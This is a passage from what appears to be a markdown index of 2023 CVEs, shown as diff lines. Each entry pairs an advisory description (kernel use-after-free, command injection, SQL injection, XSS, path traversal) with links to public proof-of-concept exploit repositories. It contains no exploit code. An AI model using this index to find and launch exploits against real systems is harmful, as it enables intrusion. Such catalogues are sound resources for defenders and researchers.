[H4K6/CVE-2023-0179-PoC](https://github.com/H4K6/CVE-2023-0179-PoC) + +### CVE-2023-0264 (2023-08-04) + +A flaw was found in Keycloaks OpenID Connect user authentication, which may incorrectly authenticate requests. An authenticated attacker who could obtain information from a user request within the same realm could use that data to impersonate the victim and generate new session tokens. This issue could impact confidentiality, integrity, and availability. + + +- [twwd/CVE-2023-0264](https://github.com/twwd/CVE-2023-0264) + +### CVE-2023-0266 (2023-01-30) + +A use after free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks that can be used in a use-after-free that can result in a priviledge escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c83927b7ebb055e\n + + +- [SeanHeelan/claude_opus_cve_2023_0266](https://github.com/SeanHeelan/claude_opus_cve_2023_0266) + +### CVE-2023-0297 (2023-01-14) + +Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + + +- [bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad) +- [Small-ears/CVE-2023-0297](https://github.com/Small-ears/CVE-2023-0297) +- [JacobEbben/CVE-2023-0297](https://github.com/JacobEbben/CVE-2023-0297) +- [overgrowncarrot1/CVE-2023-0297](https://github.com/overgrowncarrot1/CVE-2023-0297) +- [btar1gan/exploit_CVE-2023-0297](https://github.com/btar1gan/exploit_CVE-2023-0297) +- [S4MY9/CVE-2023-0297](https://github.com/S4MY9/CVE-2023-0297) + +### CVE-2023-0315 (2023-01-16) + +Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8. + + +- [mhaskar/CVE-2023-0315](https://github.com/mhaskar/CVE-2023-0315) + +### CVE-2023-0386 (2023-03-22) + +A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system. + + +- [veritas501/CVE-2023-0386](https://github.com/veritas501/CVE-2023-0386) +- [Satheesh575555/linux-4.19.72_CVE-2023-0386](https://github.com/Satheesh575555/linux-4.19.72_CVE-2023-0386) +- [xkaneiki/CVE-2023-0386](https://github.com/xkaneiki/CVE-2023-0386) +- [chenaotian/CVE-2023-0386](https://github.com/chenaotian/CVE-2023-0386) +- [3yujw7njai/CVE-2023-0386](https://github.com/3yujw7njai/CVE-2023-0386) +- [hshivhare67/kernel_v4.19.72_CVE-2023-0386](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0386) +- [sxlmnwb/CVE-2023-0386](https://github.com/sxlmnwb/CVE-2023-0386) +- [Fanxiaoyao66/CVE-2023-0386](https://github.com/Fanxiaoyao66/CVE-2023-0386) +- [puckiestyle/CVE-2023-0386](https://github.com/puckiestyle/CVE-2023-0386) +- [letsr00t/CVE-2023-0386](https://github.com/letsr00t/CVE-2023-0386) +- [churamanib/CVE-2023-0386](https://github.com/churamanib/CVE-2023-0386) +- [EstamelGG/CVE-2023-0386-libs](https://github.com/EstamelGG/CVE-2023-0386-libs) + +### CVE-2023-0400 (2023-02-01) + +\nThe protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was correctly prevented. Versions prior to 11.9 correctly detected and blocked the attempted upload of sensitive data.\n\n + + +- [pinpinsec/CVE-2023-0400](https://github.com/pinpinsec/CVE-2023-0400) + +### CVE-2023-0461 (2023-02-28) + +There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.\n\nThere is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock.\n\nWhen CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable.\n\nThe setsockopt TCP_ULP operation does not require any privilege.\n\nWe recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c + + +- [hshivhare67/kernel_v4.19.72_CVE-2023-0461](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0461) + +### CVE-2023-0464 (2023-03-22) + +A security vulnerability has been identified in all supported versions\n\nof OpenSSL related to the verification of X.509 certificate chains\nthat include policy constraints. Attackers may be able to exploit this\nvulnerability by creating a malicious certificate chain that triggers\nexponential use of computational resources, leading to a denial-of-service\n(DoS) attack on affected systems.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function. + + +- [Trinadh465/Openssl_1.1.1g_CVE-2023-0464](https://github.com/Trinadh465/Openssl_1.1.1g_CVE-2023-0464) + +### CVE-2023-0630 (2023-03-20) + +The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + + +- [RandomRobbieBF/CVE-2023-0630](https://github.com/RandomRobbieBF/CVE-2023-0630) + +### CVE-2023-0656 (2023-03-02) + +A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash. + + +- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656) + +### CVE-2023-0669 (2023-02-06) + +Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2. + + +- [0xf4n9x/CVE-2023-0669](https://github.com/0xf4n9x/CVE-2023-0669) +- [cataliniovita/CVE-2023-0669](https://github.com/cataliniovita/CVE-2023-0669) +- [Griffin-01/CVE-2023-0669](https://github.com/Griffin-01/CVE-2023-0669) +- [yosef0x01/CVE-2023-0669-Analysis](https://github.com/yosef0x01/CVE-2023-0669-Analysis) +- [Avento/CVE-2023-0669](https://github.com/Avento/CVE-2023-0669) + +### CVE-2023-0748 (2023-02-08) + +Open Redirect in GitHub repository btcpayserver/btcpayserver prior to 1.7.6.\n\n + + +- [gonzxph/CVE-2023-0748](https://github.com/gonzxph/CVE-2023-0748) + +### CVE-2023-08 +- [amirzargham/CVE-2023-08-21-exploit](https://github.com/amirzargham/CVE-2023-08-21-exploit) + +### CVE-2023-0830 (2023-02-14) + +Es wurde eine kritische Schwachstelle in EasyNAS 1.1.0 entdeckt. Es betrifft die Funktion system der Datei /backup.pl. Durch Manipulation mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [xbz0n/CVE-2023-0830](https://github.com/xbz0n/CVE-2023-0830) + +### CVE-2023-0860 (2023-02-16) + +Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4. + + +- [0xsu3ks/CVE-2023-0860](https://github.com/0xsu3ks/CVE-2023-0860) + +### CVE-2023-0861 (2023-02-16) + +NetModule NSRW web administration interface executes an OS command constructed with unsanitized user input. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges.\nThis issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 before 4.6.0.105, from 4.7.0.0 before 4.7.0.103.\n\n + + +- [seifallahhomrani1/CVE-2023-0861-POC](https://github.com/seifallahhomrani1/CVE-2023-0861-POC) + +### CVE-2023-422 +- [HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE](https://github.com/HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE) + +### CVE-2023-1112 (2023-03-01) + +Es wurde eine kritische Schwachstelle in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 für WordPress ausgemacht. Es geht dabei um eine nicht klar definierte Funktion der Datei admin-ajax.php. Durch Manipulation des Arguments upload_name mit unbekannten Daten kann eine relative path traversal-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal](https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal) + +### CVE-2023-1177 (2023-03-24) + +Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.2.1.\n\n + + +- [hh-hunter/ml-CVE-2023-1177](https://github.com/hh-hunter/ml-CVE-2023-1177) +- [iumiro/CVE-2023-1177-MLFlow](https://github.com/iumiro/CVE-2023-1177-MLFlow) +- [tiyeume25112004/CVE-2023-1177-rebuild](https://github.com/tiyeume25112004/CVE-2023-1177-rebuild) +- [saimahmed/MLflow-Vuln](https://github.com/saimahmed/MLflow-Vuln) +- [charlesgargasson/CVE-2023-1177](https://github.com/charlesgargasson/CVE-2023-1177) + +### CVE-2023-1326 (2023-04-13) + +A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit. + + +- [diego-tella/CVE-2023-1326-PoC](https://github.com/diego-tella/CVE-2023-1326-PoC) +- [Pol-Ruiz/CVE-2023-1326](https://github.com/Pol-Ruiz/CVE-2023-1326) +- [n3rdh4x0r/CVE-2023-1326](https://github.com/n3rdh4x0r/CVE-2023-1326) +- [cve-2024/CVE-2023-1326-PoC](https://github.com/cve-2024/CVE-2023-1326-PoC) + +### CVE-2023-1337 (2023-03-10) + +The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files. + + +- [Penkyzduyi/CVE-2023-1337](https://github.com/Penkyzduyi/CVE-2023-1337) + +### CVE-2023-1389 (2023-03-15) + +TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request. + + +- [Voyag3r-Security/CVE-2023-1389](https://github.com/Voyag3r-Security/CVE-2023-1389) +- [Terminal1337/CVE-2023-1389](https://github.com/Terminal1337/CVE-2023-1389) + +### CVE-2023-1415 (2023-03-15) + +In Simple Art Gallery 1.0 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Das betrifft die Funktion sliderPicSubmit der Datei adminHome.php. Mit der Manipulation mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. + + +- [0xxtoby/CVE-2023-1415](https://github.com/0xxtoby/CVE-2023-1415) + +### CVE-2023-1430 (2023-06-09) + +The FluentCRM - Marketing Automation For WordPress plugin for WordPress is vulnerable to unauthorized modification of data in versions up to, and including, 2.7.40 due to the use of an MD5 hash without a salt to control subscriptions. This makes it possible for unauthenticated attackers to unsubscribe users from lists and manage subscriptions, granted they gain access to any targeted subscribers email address. + + +- [karlemilnikka/CVE-2023-1430](https://github.com/karlemilnikka/CVE-2023-1430) + +### CVE-2023-1454 (2023-03-17) + +Es wurde eine Schwachstelle in jeecg-boot 3.5.0 entdeckt. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei jmreport/qurestSql. Durch Beeinflussen des Arguments apiSelectId mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [gobysec/CVE-2023-1454](https://github.com/gobysec/CVE-2023-1454) +- [cjybao/CVE-2023-1454](https://github.com/cjybao/CVE-2023-1454) +- [3yujw7njai/CVE-2023-1454-EXP](https://github.com/3yujw7njai/CVE-2023-1454-EXP) +- [BugFor-Pings/CVE-2023-1454](https://github.com/BugFor-Pings/CVE-2023-1454) +- [padbergpete47/CVE-2023-1454](https://github.com/padbergpete47/CVE-2023-1454) +- [Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln](https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln) +- [shad0w0sec/CVE-2023-1454-EXP](https://github.com/shad0w0sec/CVE-2023-1454-EXP) + +### CVE-2023-1488 (2023-03-18) + +Es wurde eine Schwachstelle in Lespeed WiseCleaner Wise System Monitor 1.5.3.54 gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion 0x9C40A0D8/0x9C40A0DC/0x9C40A0E0 in der Bibliothek WiseHDInfo64.dll der Komponente IoControlCode Handler. Durch Manipulieren mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Der Angriff hat dabei lokal zu erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [bxtshit/CVE-2023-1488](https://github.com/bxtshit/CVE-2023-1488) + +### CVE-2023-1498 (2023-03-19) + +Es wurde eine kritische Schwachstelle in code-projects Responsive Hotel Site 1.0 entdeckt. Dabei betrifft es einen unbekannter Codeteil der Datei messages.php der Komponente Newsletter Log Handler. Durch Beeinflussen des Arguments title mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [Decemberus/BugHub](https://github.com/Decemberus/BugHub) + +### CVE-2023-1665 (2023-03-27) + +Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0. + + +- [0xsu3ks/CVE-2023-1665](https://github.com/0xsu3ks/CVE-2023-1665) + +### CVE-2023-1671 (2023-04-04) + +A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + + +- [ohnonoyesyes/CVE-2023-1671](https://github.com/ohnonoyesyes/CVE-2023-1671) +- [W01fh4cker/CVE-2023-1671-POC](https://github.com/W01fh4cker/CVE-2023-1671-POC) +- [csffs/cve-2023-1671](https://github.com/csffs/cve-2023-1671) + +### CVE-2023-1698 (2023-05-15) + +In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise. + + +- [Chocapikk/CVE-2023-1698](https://github.com/Chocapikk/CVE-2023-1698) +- [deIndra/CVE-2023-1698](https://github.com/deIndra/CVE-2023-1698) +- [thedarknessdied/WAGO-CVE-2023-1698](https://github.com/thedarknessdied/WAGO-CVE-2023-1698) + +### CVE-2023-1718 (2023-11-01) + +\nImproper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".\n\n\n\n\n\n + + +- [jhonnybonny/Bitrix24DoS](https://github.com/jhonnybonny/Bitrix24DoS) + +### CVE-2023-1767 (2023-04-20) + +The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor. + + +- [weizman/CVE-2023-1767](https://github.com/weizman/CVE-2023-1767) + +### CVE-2023-1773 (2023-03-31) + +In Rockoa 2.3.2 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei webmainConfig.php der Komponente Configuration File Handler. Durch Beeinflussen mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [CTF-Archives/xinhu-v2.3.2](https://github.com/CTF-Archives/xinhu-v2.3.2) + +### CVE-2023-1829 (2023-04-12) + +A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.\nWe recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.\n\n + + +- [lanleft/CVE-2023-1829](https://github.com/lanleft/CVE-2023-1829) + +### CVE-2023-1874 (2023-04-12) + +The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wpda_role[]' parameter during a profile update. This requires the 'Enable role management' setting to be enabled for the site. + + +- [thomas-osgood/cve-2023-1874](https://github.com/thomas-osgood/cve-2023-1874) + +### CVE-2023-1999 (2023-06-20) + +There exists a use after free/double free in libwebp. An attacker can use the ApplyFiltersAndEncode() function and loop through to free best.bw and assign best = trial pointer. The second loop will then return 0 because of an Out of memory error in VP8 encoder, the pointer is still assigned to trial and the AddressSanitizer will attempt a double free. \n + + +- [Pazhanivelmani/webp_Android10_r33_CVE-2023-1999](https://github.com/Pazhanivelmani/webp_Android10_r33_CVE-2023-1999) + +### CVE-2023-2002 (2023-05-26) + +A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication. + + +- [lrh2000/CVE-2023-2002](https://github.com/lrh2000/CVE-2023-2002) + +### CVE-2023-2008 (2023-04-14) + +A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. + + +- [bluefrostsecurity/CVE-2023-2008](https://github.com/bluefrostsecurity/CVE-2023-2008) + +### CVE-2023-2023 (2023-05-30) + +The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + + +- [thatformat/Hvv2023](https://github.com/thatformat/Hvv2023) +- [druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation](https://github.com/druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation) + +### CVE-2023-2024 (2023-05-18) + +Improper authentication in OpenBlue Enterprise Manager Data Collector versions prior to 3.2.5.75 allow access to an unauthorized user under certain circumstances. + + +- [team890/CVE-2023-2024](https://github.com/team890/CVE-2023-2024) + +### CVE-2023-2033 (2023-04-14) + +Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [insoxin/CVE-2023-2033](https://github.com/insoxin/CVE-2023-2033) +- [sandumjacob/CVE-2023-2033-Analysis](https://github.com/sandumjacob/CVE-2023-2033-Analysis) +- [gretchenfrage/CVE-2023-2033-analysis](https://github.com/gretchenfrage/CVE-2023-2033-analysis) +- [mistymntncop/CVE-2023-2033](https://github.com/mistymntncop/CVE-2023-2033) +- [tianstcht/CVE-2023-2033](https://github.com/tianstcht/CVE-2023-2033) + +### CVE-2023-2114 (2023-05-08) + +The NEX-Forms WordPress plugin before 8.4 does not properly escape the `table` parameter, which is populated with user input, before concatenating it to an SQL query. + + +- [SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114](https://github.com/SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114) + +### CVE-2023-2123 (2023-08-16) + +The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + + +- [0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin](https://github.com/0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin) + +### CVE-2023-2163 (2023-09-20) + +Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafe\ncode paths being incorrectly marked as safe, resulting in arbitrary read/write in\nkernel memory, lateral privilege escalation, and container escape. + + +- [letsr00t/CVE-2023-2163](https://github.com/letsr00t/CVE-2023-2163) + +### CVE-2023-2215 (2023-04-21) + +Es wurde eine kritische Schwachstelle in Campcodes Coffee Shop POS System 1.0 entdeckt. Es betrifft eine unbekannte Funktion der Datei /admin/user/manage_user.php. Mittels Manipulieren des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [zwxxb/CVE-2023-2215](https://github.com/zwxxb/CVE-2023-2215) + +### CVE-2023-2249 (2023-06-09) + +The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services. + + +- [ixiacom/CVE-2023-2249](https://github.com/ixiacom/CVE-2023-2249) + +### CVE-2023-2255 (2023-05-25) + +Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3. + + +- [elweth-sec/CVE-2023-2255](https://github.com/elweth-sec/CVE-2023-2255) +- [SaintMichae64/CVE-2023-2255](https://github.com/SaintMichae64/CVE-2023-2255) + +### CVE-2023-2375 (2023-04-28) + +Eine kritische Schwachstelle wurde in Ubiquiti EdgeRouter X bis 2.0.9-hotfix.6 gefunden. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Web Management Interface. Mittels Manipulieren des Arguments src mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [0x0jr/HTB-Devvortex-CVE-2023-2375-PoC](https://github.com/0x0jr/HTB-Devvortex-CVE-2023-2375-PoC) + +### CVE-2023-2437 (2023-11-22) + +The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability. + + +- [RxRCoder/CVE-2023-2437](https://github.com/RxRCoder/CVE-2023-2437) + +### CVE-2023-2516 (2023-05-05) + +Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.7. + + +- [mnqazi/CVE-2023-2516](https://github.com/mnqazi/CVE-2023-2516) + +### CVE-2023-2523 (2023-05-04) + +Eine kritische Schwachstelle wurde in Weaver E-Office 9.5 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei App/Ajax/ajax.php?action=mobile_upload_save. Mittels Manipulieren des Arguments upload_quwan mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [bingtangbanli/cve-2023-2523-and-cve-2023-2648](https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648) +- [Any3ite/CVE-2023-2523](https://github.com/Any3ite/CVE-2023-2523) + +### CVE-2023-2579 (2023-07-17) + +The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks. + + +- [0xn4d/poc-cve-xss-inventory-press-plugin](https://github.com/0xn4d/poc-cve-xss-inventory-press-plugin) + +### CVE-2023-2591 (2023-05-09) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitHub repository nilsteampassnet/teampass prior to 3.0.7. + + +- [mnqazi/CVE-2023-2591](https://github.com/mnqazi/CVE-2023-2591) + +### CVE-2023-2594 (2023-05-09) + +Es wurde eine Schwachstelle in SourceCodester Food Ordering Management System 1.0 gefunden. Sie wurde als kritisch eingestuft. Hiervon betroffen ist ein unbekannter Codeblock der Komponente Registration. Durch die Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. + + +- [thehackingverse/CVE-2023-2594](https://github.com/thehackingverse/CVE-2023-2594) + +### CVE-2023-2598 (2023-06-01) + +A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation. + + +- [ysanatomic/io_uring_LPE-CVE-2023-2598](https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598) +- [cainiao159357/CVE-2023-2598](https://github.com/cainiao159357/CVE-2023-2598) +- [LLfam/CVE-2023-2598](https://github.com/LLfam/CVE-2023-2598) + +### CVE-2023-2603 (2023-06-06) + +A vulnerability was found in libcap. This issue occurs in the _libcap_strdup() function and can lead to an integer overflow if the input string is close to 4GiB. + + +- [Pazhanivelmani/external_libcap-Android10_r33_CVE-2023-2603](https://github.com/Pazhanivelmani/external_libcap-Android10_r33_CVE-2023-2603) + +### CVE-2023-2636 (2023-07-17) + +The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber + + +- [lukinneberg/CVE-2023-2636](https://github.com/lukinneberg/CVE-2023-2636) + +### CVE-2023-2640 (2023-07-26) + +On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks. + + +- [OllaPapito/gameoverlay](https://github.com/OllaPapito/gameoverlay) +- [luanoliveira350/GameOverlayFS](https://github.com/luanoliveira350/GameOverlayFS) +- [g1vi/CVE-2023-2640-CVE-2023-32629](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629) +- [musorblyat/CVE-2023-2640-CVE-2023-32629](https://github.com/musorblyat/CVE-2023-2640-CVE-2023-32629) +- [SanjayRagavendar/Ubuntu-GameOver-Lay](https://github.com/SanjayRagavendar/Ubuntu-GameOver-Lay) +- [Nkipohcs/CVE-2023-2640-CVE-2023-32629](https://github.com/Nkipohcs/CVE-2023-2640-CVE-2023-32629) +- [K5LK/CVE-2023-2640-32629](https://github.com/K5LK/CVE-2023-2640-32629) + +### CVE-2023-2650 (2023-05-30) + +Issue summary: Processing some specially crafted ASN.1 object identifiers or\ndata containing them may be very slow.\n\nImpact summary: Applications that use OBJ_obj2txt() directly, or use any of\nthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message\nsize limit may experience notable to very long delays when processing those\nmessages, which may lead to a Denial of Service.\n\nAn OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -\nmost of which have no size limit. OBJ_obj2txt() may be used to translate\nan ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL\ntype ASN1_OBJECT) to its canonical numeric text form, which are the\nsub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by\nperiods.\n\nWhen one of the sub-identifiers in the OBJECT IDENTIFIER is very large\n(these are sizes that are seen as absurdly large, taking up tens or hundreds\nof KiBs), the translation to a decimal number in text may take a very long\ntime. The time complexity is O(n^2) with 'n' being the size of the\nsub-identifiers in bytes (*).\n\nWith OpenSSL 3.0, support to fetch cryptographic algorithms using names /\nidentifiers in string form was introduced. This includes using OBJECT\nIDENTIFIERs in canonical numeric text form as identifiers for fetching\nalgorithms.\n\nSuch OBJECT IDENTIFIERs may be received through the ASN.1 structure\nAlgorithmIdentifier, which is commonly used in multiple protocols to specify\nwhat cryptographic algorithm should be used to sign or verify, encrypt or\ndecrypt, or digest passed data.\n\nApplications that call OBJ_obj2txt() directly with untrusted data are\naffected, with any version of OpenSSL. If the use is for the mere purpose\nof display, the severity is considered low.\n\nIn OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,\nCMS, CMP/CRMF or TS. It also impacts anything that processes X.509\ncertificates, including simple things like verifying its signature.\n\nThe impact on TLS is relatively low, because all versions of OpenSSL have a\n100KiB limit on the peer's certificate chain. Additionally, this only\nimpacts clients, or servers that have explicitly enabled client\nauthentication.\n\nIn OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,\nsuch as X.509 certificates. This is assumed to not happen in such a way\nthat it would cause a Denial of Service, so these versions are considered\nnot affected by this issue in such a way that it would be cause for concern,\nand the severity is therefore considered low. + + +- [hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650](https://github.com/hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650) + +### CVE-2023-2728 (2023-07-03) + +Users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with ephemeral containers.\n\n + + +- 